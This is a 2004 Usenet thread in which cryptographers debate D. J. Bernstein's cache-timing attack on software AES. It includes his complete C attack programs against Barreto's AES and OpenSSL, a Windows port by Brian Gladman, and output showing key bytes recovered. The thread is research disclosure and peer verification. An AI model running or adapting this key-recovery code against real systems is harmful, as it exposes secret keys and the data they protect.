Don't use S-boxes!

59 views
Skip to first unread message

D. J. Bernstein

unread,
Nov 11, 2004, 1:39:25 PM11/11/04
to
http://cr.yp.to/papers.html#cachetiming

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

Arnaud Carré

unread,
Nov 11, 2004, 1:26:01 PM11/11/04
to

"D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
slrncp7adr....@stoneport.math.uic.edu...
> http://cr.yp.to/papers.html#cachetiming

Oh !! I'm very happy to be one of the first reading such a awesome
affirmation :-)

I'm afraid it will re-activate the debat few thread ago about "RC4 is not
secure, AES is secure :-)"

Please could you detail what does it change "in practice" for AES users ?

Arnaud


Tom St Denis

unread,
Nov 11, 2004, 3:38:22 PM11/11/04
to
D. J. Bernstein wrote:
> http://cr.yp.to/papers.html#cachetiming

I've implemented your algo and got

b = 0, loops = 1024 79 22 134 157 179 174 41 242 217 86
b = 1, loops = 1024 165 243 71 220 200 98 206 224 72 183
b = 2, loops = 1024 136 249 77 147 238 75 78 126 208 206
b = 3, loops = 1024 173 175 61 19 141 173 203 161 114 223
b = 4, loops = 1024 219 111 39 202 206 100 129 119 10 60
b = 5, loops = 1024 64 92 163 92 144 21 154 136 131 23
b = 6, loops = 1024 218 147 228 193 232 97 60 229 228 229
b = 7, loops = 1024 6 129 81 224 108 145 44 252 32 140
b = 8, loops = 1024 190 16 30 211 238 64 235 231 29 76
b = 9, loops = 1024 211 47 71 78 87 63 67 18 40 181
b = 10, loops = 1024 232 107 14 55 158 68 234 253 86 192
b = 11, loops = 1024 31 143 206 106 47 126 159 177 54 110
b = 12, loops = 1024 234 114 124 22 217 162 203 189 145 62
b = 13, loops = 1024 208 72 100 200 119 78 34 123 144 130
b = 14, loops = 1024 134 250 191 171 186 208 151 4 197 33
b = 15, loops = 1024 215 158 18 58 208 43 81 208 180 143

On my AMD64 using LTC 0.99.

In particular for the noted bytes 1, 5, 9 it seems only that byte 5
really shows a "bias" of having 92 appear twice [probability iicc is
roughly 43.61/65536 or 0.000665479]

I don't quite get what you are trying to prove by this table [which
totally doesn't agree with your results]. A byte value that takes the
longest means what? There are 10 rounds in AES-128 and changing that
one byte will cause a difference in ALL 16 bytes after the second round
[compared to any other in the set].

I have put my source tarball for the demo at

http://libtomcrypt.org/djaes.tar.bz2

So far my initial assessment is the "bias" doesn't actually work or
isn't very practical.

Some things to note about my setup:

- Running Gentoo Linux on an 2.2Ghz AMD64
- Used GCC 3.4.2-r1
- Had gaim, xmms, mozilla, Xdvi, Apache2, sshd, Gnome and applets running
- Linked in LibTomCrypt 0.99 [with patchset 001] using the shared object

Maybe if I shut down all active processes and unniced it it would work
better who knows...

Tom

Tom St Denis

unread,
Nov 11, 2004, 3:40:02 PM11/11/04
to
Arnaud Carré wrote:
> "D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
> slrncp7adr....@stoneport.math.uic.edu...
>
>>http://cr.yp.to/papers.html#cachetiming
>
>
> Oh !! I'm very happy to be one of the first reading such a awesome
> affirmation :-)

Question. Did you actually test his claim first?

> I'm afraid it will re-activate the debat few thread ago about "RC4 is not
> secure, AES is secure :-)"

RC4 *isn't* secure. If DJ is right than AES is not secure either.

One doesn't influence the other.

> Please could you detail what does it change "in practice" for AES users ?

Depends on if other can confirm the results. So far on my AMD64 it
doesn't work.

[Note: this isn't the first "break" of AES that didn't work and I doubt
it will be the last. Not to say that people trying is bad. Quite the
opposite it's good. Just jumping the bandwagon without checking it out
is bad.]

Tom

Tom St Denis

unread,
Nov 11, 2004, 3:57:31 PM11/11/04
to
Tom St Denis wrote:
> I have put my source tarball for the demo at
>
> http://libtomcrypt.org/djaes.tar.bz2
>
> So far my initial assessment is the "bias" doesn't actually work or
> isn't very practical.

Some other comments about the paper

- Salsa10 isn't a block cipher so comparing it to AES is meaningless
- << and >> are **not** "cheap" as timing independent on 8-bit cpus
- He cites xtea/helix/sha256 as secure designs but doesn't prove or cite
proofs for this claim
- He fails to prove or state what Salsa10 is secure against

...

Tom

BRG

unread,
Nov 11, 2004, 4:12:26 PM11/11/04
to
Tom St Denis wrote:

> Arnaud Carré wrote:
>
>> "D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
>> slrncp7adr....@stoneport.math.uic.edu...
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>
>> Oh !! I'm very happy to be one of the first reading such a awesome
>> affirmation :-)
>
>
> Question. Did you actually test his claim first?
>
>> I'm afraid it will re-activate the debat few thread ago about "RC4 is
>> not secure, AES is secure :-)"
>
>
> RC4 *isn't* secure. If DJ is right than AES is not secure either.

If I am reading this correctly, his claim is not that AES is insecure
but rather that particular _implementations_ of AES might be insecure
because they might leak key bits when subject to timing attacks.

Brian Gladman

D. J. Bernstein

unread,
Nov 11, 2004, 5:48:47 PM11/11/04
to
BRG wrote:
> If I am reading this correctly, his claim is not that AES is insecure
> but rather that particular _implementations_ of AES might be insecure
> because they might leak key bits when subject to timing attacks.

More than that: I'm saying that _typical_ software implementations of
AES _do_ leak key bits to the simplest conceivable timing attack. The
underlying problem is that it's hard to do an S-box lookup in constant
time on modern CPUs.

BRG

unread,
Nov 11, 2004, 5:13:08 PM11/11/04
to
Tom St Denis wrote:

I also did this separately and we seem to agree on what is involved.

I don't see the effect described in the paper either.

Brian Gladman

Tom St Denis

unread,
Nov 11, 2004, 6:00:25 PM11/11/04
to
D. J. Bernstein wrote:
> BRG wrote:
>
>>If I am reading this correctly, his claim is not that AES is insecure
>>but rather that particular _implementations_ of AES might be insecure
>>because they might leak key bits when subject to timing attacks.
>
>
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack. The
> underlying problem is that it's hard to do an S-box lookup in constant
> time on modern CPUs.

I don't see the attack as being practical and here is why.

Say you do two encryptions where you toggle byte k of the input [for
AES]. In round three, all bytes MUST be different between the two
16-byte blocks. It's then more plausible that they will "scatter"
throughout cache usage because all 16 bytes will now access different
parts of their respective 1kb arrays [though they could be on the same
page].

Also AES only requires 4KB of cache that is likely to be in L1 or L2
because it's adjacent. I'd hazard the guess that in most crypto
implementations on a cpu with enough cache for the OS + buffers + aes
that you're likely to not have that many cache misses after the first
few thousand blocks.

Not only that but you don't know when the cache miss occurs. Doesn't
tell you much about which lookups actually missed [because of the change
in input].

That and both myself and Brian cannot reproduce the results doesn't bode
well for the attack. Perhaps you could post your source code that you
ran and we can check either we implemented it wrong or you described it
wrong?

Tom

BRG

unread,
Nov 11, 2004, 6:01:14 PM11/11/04
to
D. J. Bernstein wrote:
> BRG wrote:
>
>>If I am reading this correctly, his claim is not that AES is insecure
>>but rather that particular _implementations_ of AES might be insecure
>>because they might leak key bits when subject to timing attacks.
>
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack. The
> underlying problem is that it's hard to do an S-box lookup in constant
> time on modern CPUs.

Yes, I agree that your claims are much wider than my comment here suggested.

But my aim in making a response to what Tom said was not to comment on
these wider issues but simply to avoid any suggestion that you are
claiming that the AES _algorithm_ is insecure when considered at an
abstract level.

Brian Gladman

Tom St Denis

unread,
Nov 11, 2004, 6:11:46 PM11/11/04
to

My AES code was derived from the PD code by the Rijndael team that most
other sources use [GPG for instance uses it]. So unless D.J. found a
significantly new way to implement AES I suspect that he too uses the
same style implementation.

Also if his intention was to suggest that implementations ought to
tighten up then why would he propose Salsa10 as a "new methodology"?

I'm forming my own opinions on his motivations but I'll wait to see if
he'll post his test code before sharing them :-)

Tom

BRG

unread,
Nov 11, 2004, 6:29:55 PM11/11/04
to
Tom St Denis wrote:

> BRG wrote:
>
>> D. J. Bernstein wrote:
>>

[snip]


> My AES code was derived from the PD code by the Rijndael team that most
> other sources use [GPG for instance uses it]. So unless D.J. found a
> significantly new way to implement AES I suspect that he too uses the
> same style implementation.

I have now run the tests using Paulo Barreto's AES code (this code was
used by DJB) as well as my own. I have done this on both Intel P3 and
P4 systems and cannot reproduce the results.

> Also if his intention was to suggest that implementations ought to
> tighten up then why would he propose Salsa10 as a "new methodology"?
>
> I'm forming my own opinions on his motivations but I'll wait to see if
> he'll post his test code before sharing them :-)

I remain to be convinced that this is as serious as DJB is suggesting.

Brian Gladman

D. J. Bernstein

unread,
Nov 11, 2004, 7:28:52 PM11/11/04
to
Brian Gladman wrote:
> I have now run the tests using Paulo Barreto's AES code (this code was
> used by DJB) as well as my own. I have done this on both Intel P3 and
> P4 systems and cannot reproduce the results.

Perhaps your variable alignments were lucky and avoided any overlaps in
the L1 cache; this won't happen in a large cryptographic program but it
could happen in a small test program. The more basic point is that the
timings depend heavily on the exact program you use, the compiler, and
the CPU.

Here's an example of 24 key bits leaking to the same trivial timing
attack in a few seconds on a Pentium M. I took Barreto's code, made an
easy translation from C++ to C, and ran

gcc -o time time.c barreto.c -O2
./time < /dev/urandom

with gcc 2.95.4 under FreeBSD 4.10. Output excerpt:

0, 64 loops: 114 10 83 65 235 62 76 144 65 8 200 37 35 14 150 39
1, 64 loops: 139 166 138 2 96 216 189 169 169 125 55 218 84 94 42 72
2, 64 loops: 127 96 211 151 186 194 194 202 237 252 251 102 200 127 31 39
3, 64 loops: 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76
4, 64 loops: 156 40 14 13 77 174 249 86 120 170 205 160 159 226 39 16
5, 64 loops: 24 189 115 81 106 101 108 107 50 199 25 240 168 85 49 156
6, 64 loops: 245 30 229 163 236 172 75 205 141 42 133 150 42 235 37 43
7, 64 loops: 79 105 173 50 201 79 38 14 115 192 43 40 222 175 52 26
8, 64 loops: 158 132 69 14 101 145 114 203 173 150 245 37 173 138 145 115
9, 64 loops: 127 94 80 118 234 15 199 197 86 80 122 51 36 23 59 45
10, 64 loops: 234 216 130 220 147 184 114 215 104 129 201 58 104 209 11 233
11, 64 loops: 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75
12, 64 loops: 110 102 182 214 82 202 109 108 133 94 37 95 66 158 152 66
13, 64 loops: 233 152 14 158 36 30 133 127 28 145 42 105 238 3 88 70
14, 64 loops: 150 7 2 142 47 142 17 117 58 96 208 34 113 191 231 183
15, 64 loops: 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73

The time.c program is shown below.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago


#include <stdio.h>

typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))

unsigned char expanded[176];
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

int cycles(void)
{
timing tstart;
timing tend;
int t;
do {
timing_now(&tstart);
aes_encrypt(out,in,expanded);
timing_now(&tend);
t = timing_diff(&tend,&tstart);
} while (t <= 0 || t >= 1500);
return t;
}

int loops = 1;

int bump(int b)
{
int i;
int j;
int x;
int xt;
int bestx;
int bestxt = 0;

for (x = 0;x < 256;++x) {
xt = 0;
for (i = 0;i < loops;++i) {
for (j = 0;j < 16;++j) in[j] = random() >> 16;
in[b] = x;
xt += cycles() + cycles() + cycles();
}
if (xt > bestxt) {
bestx = x;
bestxt = xt;
}
}
return bestx;
}

main()
{
int j;
int k;
int b;

for (loops = 4;loops <= 65536;loops *= 2) {
for (b = 0;b < 16;++b) {
printf("%d, %d loops:",b,loops);
for (k = 0;k < 16;++k) {
for (j = 0;j < 16;++j) key[j] = getchar();
aes_expand(expanded,key);
printf(" %d",bump(b) ^ key[b]);
fflush(stdout);
}
printf("\n");
}
}

return 0;
}

Skybuck Flying

unread,
Nov 11, 2004, 7:24:34 PM11/11/04
to
Ok,

I am just a "random" programmer...

How much of a concern is this ?

I mean windows is multi threaded... all kinds of events happen all the time.

Doesn't this completely throw off all timings ?

Besides from that..... let's look at the following scenerio:

Computer 1 <-> Middle Man <-> Computer 2.

Now your the middle man...

You don't know what kind of hardware computer 1 and computer 2 are using...

Even if you did know you have no access to there timing etc...

How could you possible "crack" any protocol that is being used to
communicate

between Computer 1, Computer 2 and you in between lol.

I don't see it ;)

Can you ?

Bye,
Skybuck.


D. J. Bernstein

unread,
Nov 11, 2004, 7:58:10 PM11/11/04
to
Skybuck Flying wrote:
> I mean windows is multi threaded... all kinds of events happen all the time.
> Doesn't this completely throw off all timings ?

No. It adds a random-looking delay to some of the timings. The attacker
can simply ignore the unusually long timings. The attacker can also take
advantage of the delays to gain information about cache misses inserted
into the middle of the AES computation; this requires averaging over a
large number of timings, but it's doable.

> How could you possible "crack" any protocol that is being used to
> communicate between Computer 1, Computer 2 and you in between lol.

My paper cites the Brumley-Boneh paper ``Remote timing attacks are
practical,'' which you obviously need to read.

Skybuck Flying

unread,
Nov 11, 2004, 8:56:40 PM11/11/04
to

"D. J. Bernstein" <d...@cr.yp.to> wrote in message
news:slrncp80jv....@stoneport.math.uic.edu...

> Skybuck Flying wrote:
> > I mean windows is multi threaded... all kinds of events happen all the
time.
> > Doesn't this completely throw off all timings ?
>
> No. It adds a random-looking delay to some of the timings. The attacker
> can simply ignore the unusually long timings. The attacker can also take
> advantage of the delays to gain information about cache misses inserted
> into the middle of the AES computation; this requires averaging over a
> large number of timings, but it's doable.
>
> > How could you possible "crack" any protocol that is being used to
> > communicate between Computer 1, Computer 2 and you in between lol.
>
> My paper cites the Brumley-Boneh paper ``Remote timing attacks are
> practical,'' which you obviously need to read.

Do you happen to have link to a PDF document or html file ?

Bye,
Skybuck.


D. J. Bernstein

unread,
Nov 11, 2004, 10:28:08 PM11/11/04
to
Tom St Denis wrote:
> A byte value that takes the longest means what?

Often it tells you the corresponding key byte, because---for example---
the xor of those bytes, which is used as a round-1 S-box index, incurs
an L1 cache miss. If you know how the cache works and where the program
stores its variables, you can figure out which xor values will trigger
this behavior; or you can see the values from a trivial test, as I did.

D. J. Bernstein

unread,
Nov 12, 2004, 1:13:30 AM11/12/04
to
Here's another example. The same easy timing attack, applied to OpenSSL
under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:

% gcc -o time time.c -lssl -lcrypto -O2
% ./time < /dev/urandom
...
2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
...
10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
...
14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85

The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
dependence, omitting -O2 changes the constants to 86, 97, and 93.
Anyway, the complete time.c code appears below.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago


#include <stdio.h>
#include <openssl/aes.h>

typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))

AES_KEY expanded;


unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

int cycles(void)
{
timing tstart;
timing tend;
int t;
do {
timing_now(&tstart);

AES_encrypt(in,out,&expanded);

int loops = 1;

AES_set_encrypt_key(key,128,&expanded);

D. J. Bernstein

unread,
Nov 12, 2004, 1:24:56 AM11/12/04
to
Brian Gladman writes:
> But my aim in making a response to what Tom said was not to comment on
> these wider issues but simply to avoid any suggestion that you are
> claiming that the AES _algorithm_ is insecure when considered at an
> abstract level.

Right. An AES oracle---a magic box that, given n, prints AES_k(n)
exactly one time step later---is, as far as we know, indistinguishable
from an oracle for a uniform random permutation.

The problem is that real-world S-box lookups don't take constant time,
so real-world AES software doesn't take exactly one time step.

D. J. Bernstein

unread,
Nov 12, 2004, 1:36:54 AM11/12/04
to
Tom St Denis wrote:
> Also if his intention was to suggest that implementations ought to
> tighten up

The paper spends a couple of pages explaining how expensive it is to
avoid the four most obvious sources of variability in S-box timing. If
you ever manage to write an AES implementation that doesn't have
input-dependent timings, feel free to tell us exactly how slow it is.

> then why would he propose Salsa10 as a "new methodology"?

I didn't call it a ``new methodology.'' In fact, I said quite clearly
that it follows TEA and SHA-256 and Helix. Of course, the 64-byte output
is different, and various details are different; the objective, as
usual, is to find the highest-speed system that we can still reasonably
conjecture to be unbreakable.

John Savard

unread,
Nov 12, 2004, 2:15:13 AM11/12/04
to
On Fri, 12 Nov 2004 03:28:08 +0000 (UTC), "D. J. Bernstein"
<d...@cr.yp.to> wrote, in part:

>Tom St Denis wrote:
>> A byte value that takes the longest means what?
>
>Often it tells you the corresponding key byte, because---for example---
>the xor of those bytes, which is used as a round-1 S-box index, incurs
>an L1 cache miss. If you know how the cache works and where the program
>stores its variables, you can figure out which xor values will trigger
>this behavior; or you can see the values from a trivial test, as I did.

I can see that S-boxes do have a potential of allowing side attacks,
given what you say here, although in some applications the attacker
doesn't have this opportunity, and only sees the enciphered messages.

But not using S-boxes, and depending entirely on functions that can be
calculated quickly, is very likely to create cryptanalytically
exploitable weaknesses in ciphers.

Security is not enhanced if so many conditions are set on what
constitutes an acceptable cipher that it becomes too difficult for
anyone ever to design one that is secure. If ciphers are only designed
for us by the high priests of mathematics, then we are forced to trust
them.

The first rule of security is to trust no one.

For some purposes, a cipher is needed that resists all side attacks. For
others, this is not a requirement. As long as the restrictions applying
to each class of cipher are recognized, a toolkit for the construction
of basic class ciphers by people wishing to communicate by E-mail,
concerned only about distant eavesdroppers, so that they can construct
their very own cipher, may serve a purpose.

Finding ciphers using just multiplication for nonlinearity is also a
valid pursuit, because applications exist requiring side attack
resistance. But the idea that there should only be one cipher, and it
should be all things to all men, is not a good one; Terry Ritter made
valid points about the dangers of staying with the herd (although the
dangers of going too far astray, and using a cipher about whose security
nothing is known, are also valid).

John Savard
http://home.ecn.ab.ca/~jsavard/index.html

BRG

unread,
Nov 12, 2004, 5:34:16 AM11/12/04
to
D. J. Bernstein wrote:

> Here's another example. The same easy timing attack, applied to OpenSSL
> under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:
>
> % gcc -o time time.c -lssl -lcrypto -O2
> % ./time < /dev/urandom
> ...
> 2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
> ...
> 10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
> ...
> 14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
>
> The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
> dependence, omitting -O2 changes the constants to 86, 97, and 93.
> Anyway, the complete time.c code appears below.

Thank you for the code. I have had to modify this for Windows and
Microsoft VC++ (7.1) and my revision is included below for those who
might want to try this out.

After trying various combinations of AES tables I have not been able to
obtain any effects on either Intel P4 or VIA C3 processors.

But I have now found combinations of tables (using my AES code) that do
demonstrate the effect on the Intel P3 processor. Here is one P3 result
(the far right hand value is the duplicate count from 16 samples):

08, 00004 loops : 14 18 1f 37 3a 45 4d 4d 65 7c 8f a3 c8 e7 eb f7
11, 00004 loops : 18 18 22 3a 3a 3a 3a 3a 3a 41 48 84 ae c5 d7 e8 6
12, 00004 loops : 1d 1d 27 37 38 3b 3d 5e 5e 91 a2 ac b0 bd ce d4
01, 00008 loops : 2a 49 49 4b 74 77 7d 8d 91 9d 9f a8 da db f7 fb
05, 00008 loops : 07 2c 3c 46 51 58 5a 77 79 92 92 9e cd ec fc fe
08, 00008 loops : 03 13 17 17 2e 46 69 6c 76 80 8f 95 b3 e2 e6 f6
10, 00008 loops : 0f 10 16 33 3a 45 52 72 72 86 9c a3 c8 d5 f5 fa
11, 00008 loops : 3a 3a 40 68 81 9c a8 b6 c9 cf d0 d9 da ea ea f5
12, 00008 loops : 31 3c 4d 7e 81 90 99 a2 b4 b4 c5 c6 c8 c8 d1 ec
00, 00016 loops : 13 14 26 2a 37 48 52 6a 76 92 b5 c4 d6 fa fb fb
01, 00016 loops : 08 0c 2f 32 33 3e 4c 52 52 62 65 8e 9b aa ae ec
03, 00016 loops : 07 3c 47 55 67 68 7c 9c a1 d1 d6 ed f2 f8 f8 fa
04, 00016 loops : 05 05 05 0c 14 18 25 29 45 48 49 59 81 96 b0 c2 3
11, 00016 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 9c c6 f7 12
13, 00016 loops : 0a 69 69 6b 73 78 8e a2 af b4 bd c6 d2 dd ee ef
15, 00016 loops : 19 2e 35 3e 3e 44 46 52 8f 90 a2 b3 c4 e7 ed f0
01, 00032 loops : 1e 40 54 57 5d 6d a6 a7 b4 b8 b8 d5 d9 ee f0 fe
06, 00032 loops : 09 17 31 46 52 72 78 96 97 a2 b7 df e0 e0 ef fb
11, 00032 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 63 74 a0 bd d6 11
15, 00032 loops : 0e 1b 2c 35 3e 3e 3e 3e 59 63 77 83 88 94 b5 df 4
01, 00064 loops : 5e 6a 7e 7f 85 86 8b 8f 9f 9f a2 a5 d5 d9 df f7
07, 00064 loops : 05 10 15 17 2d 5f 6f 71 8b 91 ba c3 d4 ef ef fd
11, 00064 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 7e c1 c4 13
12, 00064 loops : 18 19 19 34 34 37 58 58 85 a3 a5 af ce dc df ee
15, 00064 loops : 0f 1c 24 31 3e 3e 3e 3e 56 63 65 7a 80 8e de e3 4
00, 00128 loops : 00 1b 21 45 4d 5c 60 84 96 9e 9e a6 bc cd db f7
01, 00128 loops : 0a 21 62 72 7d 8d 8d 8f 93 af b0 c5 d8 e1 e2 fc
02, 00128 loops : 01 2b 33 37 49 4a 4e 50 53 93 a0 dc ea ea ed f2
03, 00128 loops : 08 18 19 1b 24 2e 31 3a 3d 50 5e 85 ad c9 f8 f8
06, 00128 loops : 26 26 2a 37 59 5c 7c 7e a0 ba c5 c8 e2 e6 f1 fa
07, 00128 loops : 2e 37 4b 5d 70 72 75 87 9e a5 bd c5 c5 d8 e7 fe
09, 00128 loops : 2b 33 4b 4b 53 54 59 5f 70 70 92 94 97 98 af f9
10, 00128 loops : 2d 2e 4e 53 60 64 8d 91 a1 a1 b3 c2 e0 ed f9 ff
11, 00128 loops : 0e 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 8f bf c0 12
14, 00128 loops : 05 05 08 3b 4f 5d 69 6a 7a 8c ab cc ef ef f0 f8
15, 00128 loops : 07 13 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 8d 98 e4 f4 10
03, 00256 loops : 36 40 51 6b 75 8b 8b 98 a1 ac b5 e6 ec f3 fa fc
04, 00256 loops : 0a 16 30 50 65 6f 71 79 94 a2 a6 d2 d2 db e5 fd
05, 00256 loops : 02 08 17 17 1d 42 50 6a 84 c6 d8 dc e5 f6 f8 f9
06, 00256 loops : 1e 22 2c 44 51 5a 64 87 8b 9e a0 a0 b0 bc e3 ff
09, 00256 loops : 25 27 27 58 5c 84 9b 9f a9 de e2 e8 ee f2 f7 fa
11, 00256 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 5c 96 96 13
13, 00256 loops : 02 30 46 49 4e 58 7a 7e 89 95 a1 a3 a3 b0 dc ef
14, 00256 loops : 2c 32 32 3c 3d 4b 61 8b 92 b1 c2 e0 e9 eb ed ef
15, 00256 loops : 2f 3d 3e 3e 3e 3e 3e 3e 3e 3e 3e 6e 74 c6 e2 ea 9
02, 00512 loops : 04 11 38 65 70 75 7e 97 a5 ba ba dc dd e6 fd fe
04, 00512 loops : 0e 0e 38 44 56 66 67 6b 80 a9 aa bd bd ca d4 d7
05, 00512 loops : 01 3b 46 4b 59 66 6f 84 85 89 99 be c6 c7 d5 d5
08, 00512 loops : 07 18 1c 27 27 2a 4a 4b 64 72 8b 93 aa d4 e1 e5
11, 00512 loops : 11 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 14
14, 00512 loops : 1c 29 2f 4f 5c 60 6c 7c 83 83 a0 a5 c3 dd f4 f8
15, 00512 loops : 22 34 36 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 73 9b b5 10

Brian Gladman

-------------------------------------
/* Based on D. J. Bernstein's Timing Attack Code modified for
Brian Gladman's AES code and Microsoft VC++ version 7.1
*/

#include <stdio.h>
#include <stdlib.h>
#include "aes.h"

/* obtain cycle counts using the Time Stamp Counter */
#define timing_now(x) \
__asm rdtsc __asm lea ebx,x __asm mov [ebx],eax __asm mov [ebx+4],edx
#define timing_diff(x,y) (int)(x - y)

#define N_SAMPLES 16


unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

aes_encrypt_ctx ctx[1];

/* Simple PRNG combining 2 of George Marsaglia's generators */
unsigned long rand32(void)
{ static unsigned long w = 521288629, z = 362436069;
z = 36969 * (z & 65535) + (z >> 16);
w = 18000 * (w & 65535) + (w >> 16);
return (z << 16) + w;
}

unsigned char rand8(void)
{ static unsigned long r4, cnt = 4;
if(cnt == 4)
r4 = rand32(), cnt = 0;
return (unsigned char)(r4 >> 8 * cnt++);
}

int cycles(void)
{ unsigned long long tstart, tend;
int t;
do
{ timing_now(tstart);
aes_encrypt(in, out, ctx);
timing_now(tend);
t = timing_diff(tend, tstart);


}
while
(t <= 0 || t >= 1500);
return t;
}

int bump(int b, int loops)
{ int i, j, x, xt, bestx, bestxt = 0;

for(x = 0; x < 256; ++x)
{ xt = 0;
for(i = 0; i < loops; ++i)
{
for(j = 0; j < 16; ++j)
in[j] = rand8();


in[b] = x;
xt += cycles() + cycles() + cycles();
}

if(xt > bestxt)


{
bestx = x; bestxt = xt;
}
}
return bestx;
}

int cmp(const unsigned char* a, const unsigned char* b)
{
return *a < *b ? -1 : *a > *b ? 1 : 0;
}

int main(void)
{ int i, j, k, b, loops, cnt;
unsigned char v[16];

for(loops = 4; loops <= 65536; loops += loops)
{ for(b = 0; b < 16; ++b)
{ for(k = 0; k < N_SAMPLES; ++k)
{ for(j = 0; j < 16; ++j)
key[j] = rand8();
aes_encrypt_key(key, 16, ctx);
v[k] = bump(b, loops) ^ key[b];
}

qsort(v, N_SAMPLES, sizeof(unsigned char), cmp);
j = 0; cnt = 0;
do
{ if(v[j] == v[j + 1])
{ k = j;
while(++j < N_SAMPLES && v[j] == v[k])
;
cnt = (j - k > cnt ? j - k : cnt);
--j;
}
}
while
(++j < N_SAMPLES);

if(cnt > 1)
{ printf("\n%02d, %05d loops :", b, loops);
for(i = 0; i < N_SAMPLES; ++i)
printf(" %02x", v[i]);
if(cnt > 2)
printf(" %2d", cnt);
fflush(stdout);
}
}
}
return 0;
}

Tom St Denis

unread,
Nov 12, 2004, 8:10:41 AM11/12/04
to
BRG wrote:
> D. J. Bernstein wrote:
>
>> Here's another example. The same easy timing attack, applied to OpenSSL
>> under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:
>>
>> % gcc -o time time.c -lssl -lcrypto -O2
>> % ./time < /dev/urandom
>> ...
>> 2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
>> ...
>> 10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
>> ...
>> 14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
>>
>> The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
>> dependence, omitting -O2 changes the constants to 86, 97, and 93.
>> Anyway, the complete time.c code appears below.
>
>
> Thank you for the code. I have had to modify this for Windows and
> Microsoft VC++ (7.1) and my revision is included below for those who
> might want to try this out.
>
> After trying various combinations of AES tables I have not been able to
> obtain any effects on either Intel P4 or VIA C3 processors.

I found a string of "243" with his code [slightly modified to be more
x86 portable asm...] in byte 1, but when I put in my rdtsc function
[from my djaes code] I got strings of 245. So clearly what value that
pops out is dependent on the analysis software cuz both can't be right.

So the question now is why doesn't my AES code leak bytes too? My code
is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
the Rijndael teams "fast-alg" code.

I'm going to look at the SSL AES code and see if I can spot major
differences.

Tom

Phil Carmody

unread,
Nov 12, 2004, 7:00:36 AM11/12/04
to
"D. J. Bernstein" <d...@cr.yp.to> writes:

> http://cr.yp.to/papers.html#cachetiming

Interesting.

When you say that you 'reliably' leak 24 bits (bytes 1,5,9)
the third byte isn't 100% reliable, having 2 non-135 values.
I notice that the lowest bit of byte 0 is 0 for all but 2
of the values in your table. Is that statistically significant,
and if so would you consider it equally fair to say that that
particular implementation reliably leaked 25 bits, not 24?
(And by extension, some of the implementations that appear
to be leaking fewer bits might also be leaking more than they
first appear to.)

Is there any reason why AES implementations shouldn't also be
capable of leaking relations between bits even if they don't
leak explicit bits?

Phil
--
They no longer do my traditional winks tournament lunch - liver and bacon.
It's just what you need during a winks tournament lunchtime to replace lost
... liver. -- Anthony Horton, 2004/08/27 at the Cambridge 'Long Vac.'

BRG

unread,
Nov 12, 2004, 7:39:20 AM11/12/04
to
Tom St Denis wrote:

> BRG wrote:

[snip]


>>
>>
>> Thank you for the code. I have had to modify this for Windows and
>> Microsoft VC++ (7.1) and my revision is included below for those who
>> might want to try this out.
>>
>> After trying various combinations of AES tables I have not been able
>> to obtain any effects on either Intel P4 or VIA C3 processors.
>
> I found a string of "243" with his code [slightly modified to be more
> x86 portable asm...] in byte 1, but when I put in my rdtsc function
> [from my djaes code] I got strings of 245. So clearly what value that
> pops out is dependent on the analysis software cuz both can't be right.
>
> So the question now is why doesn't my AES code leak bytes too? My code
> is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
> the Rijndael teams "fast-alg" code.

